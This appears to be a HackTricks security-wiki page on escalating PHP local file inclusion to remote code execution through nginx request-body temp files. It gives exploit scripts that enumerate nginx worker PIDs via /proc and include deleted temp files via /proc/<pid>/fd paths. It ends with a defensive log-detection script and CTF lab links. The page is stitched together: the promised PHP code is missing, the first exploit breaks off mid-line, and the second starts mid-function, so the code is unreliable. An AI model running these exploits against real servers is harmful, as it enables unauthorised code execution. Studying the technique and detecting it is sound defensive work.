
# LFI2RCE via Nginx temp files

{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

### WhiteIntel

WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.

WhiteIntel's primary goal is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for free at:

{% embed url="https://whiteintel.io" %}


## Vulnerable configuration

Example from [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

* PHP code:

Listing the open file descriptors of an nginx worker (PID 34 in this example) shows the buffered request body as an already deleted temp file:

```
/dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```

Note: one cannot directly include `/proc/34/fd/15` in this example, because PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)`, which does not exist on the filesystem. Fortunately this small restriction can be bypassed with some indirection such as `/proc/self/fd/34/../../../34/fd/15`, which will ultimately execute the contents of the deleted `/var/lib/nginx/body/0000001368` file.

## Full Exploit

```python
#!/usr/bin/env python3

import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data=' //'
```

```python
        # continuation of send_payload(): the payload is padded with "a" up to body_size
        # and posted as the request body so that nginx buffers it into a temp file
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # This method creates a path from a random number of ProcFS path components.
    # A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing,
    # it is very common for the request body FD to be opened within this range
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)
```
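From the defender's side, the technique above leaves a distinctive trail in the web server access log: a sweep of `/proc/<pid>/cmdline` reads to locate worker PIDs, followed by includes of `/proc/<pid>/fd/<n>` (often hidden behind `/proc/self/fd/<n>/../../../` or `/proc/<pid>/cwd` hops). The following script is an added example, not code from this page or from the linked write-up; it parses constructed nginx "combined" log lines, classifies every query-string value against those indicators and reports per-client counts. The log lines, PIDs and the alert threshold are assumptions for the demonstration.

```python
#!/usr/bin/env python3
"""Flag access-log traffic that matches the nginx-temp-file LFI technique.

Added example, not code from the page or the linked write-up. Assumes the
web server writes the nginx "combined" log format and that the vulnerable
parameter is passed in the query string (any parameter name is inspected).
The sample lines and PIDs below are constructed.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample traffic: one client walking the technique end to end
# (cpuinfo, pid_max, /proc/<pid>/cmdline sweep, then the fd include with and
# without the ../ indirection) and one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Dec/2021:23:49:01 +0000] "GET /?file=/proc/cpuinfo HTTP/1.1" 200 812 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:49:02 +0000] "GET /?file=/proc/sys/kernel/pid_max HTTP/1.1" 200 7 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:49:02 +0000] "GET /?file=/proc/1/cmdline HTTP/1.1" 200 20 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:49:02 +0000] "GET /?file=/proc/2/cmdline HTTP/1.1" 200 0 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:49:03 +0000] "GET /?file=/proc/34/cmdline HTTP/1.1" 200 22 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:58:10 +0000] "GET /?file=/proc/self/fd/34/../../../34/fd/15 HTTP/1.1" 200 512 "-" "python-requests/2.26"
10.0.0.5 - - [25/Dec/2021:23:58:10 +0000] "GET /?file=%2Fproc%2F34%2Ffd%2F15 HTTP/1.1" 200 512 "-" "python-requests/2.26"
10.0.0.7 - - [25/Dec/2021:23:58:11 +0000] "GET /?file=about.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
PROC_FD_RE = re.compile(r'/proc/(?:self|\d+)/fd/\d+')
PROC_CMDLINE_RE = re.compile(r'^/proc/\d+/cmdline$')


def query_values(target):
    """Yield every query-string value of a request target, decoded a second
    time so that a double-encoded path (%252Fproc) is still seen as /proc."""
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            yield unquote(value)


def classify(value):
    """Map one parameter value to the indicator it matches, or None."""
    norm = value.replace('\\', '/')
    if PROC_CMDLINE_RE.match(norm):
        return 'cmdline_probes'          # worker PID enumeration
    if PROC_FD_RE.search(norm):
        # The bypass on this page puts /proc/<pid>/cwd, /root or ../ hops in
        # front of the fd path; count that as the same access, obfuscated.
        if '/../' in norm or '/cwd/' in norm or '/root/' in norm:
            return 'fd_includes_indirect'
        return 'fd_includes'
    if norm.startswith('/proc/'):
        return 'proc_reads'              # cpuinfo, pid_max, etc.
    return None


def analyze(log_text, probe_threshold=3):
    """Count indicators per client IP and attach an alert reason.

    Returns {ip: {'counts': {...}, 'alert': str | None}}. Only IPs that
    touched /proc at all appear. The threshold is an assumed default; tune
    it against the real baseline before using it for alerting.
    """
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in query_values(m.group('target')):
            kind = classify(value)
            if kind:
                per_ip[m.group('ip')][kind] += 1

    report = {}
    for ip, counts in per_ip.items():
        reasons = []
        if counts['fd_includes'] or counts['fd_includes_indirect']:
            reasons.append('include of /proc/<pid>/fd/<n> (nginx request-body temp file)')
        if counts['cmdline_probes'] >= probe_threshold:
            reasons.append(f"{counts['cmdline_probes']} /proc/<pid>/cmdline reads (worker PID sweep)")
        report[ip] = {'counts': dict(counts), 'alert': '; '.join(reasons) or None}
    return report


if __name__ == '__main__':
    for ip, entry in analyze(SAMPLE_LOG).items():
        print(ip, entry['counts'], '->', entry['alert'] or 'no alert')
```

Any include of `/proc/<pid>/fd/<n>` is alerted on immediately, since there is no legitimate reason for a web request to reference a worker's descriptor table; the `cmdline` sweep is thresholded because a single `/proc` read may be an unrelated probe. The underlying fix remains removing user control over the `include` path entirely (an allowlist of includable files rather than a filesystem path), which makes both the direct and the indirect form of the access impossible.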

## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

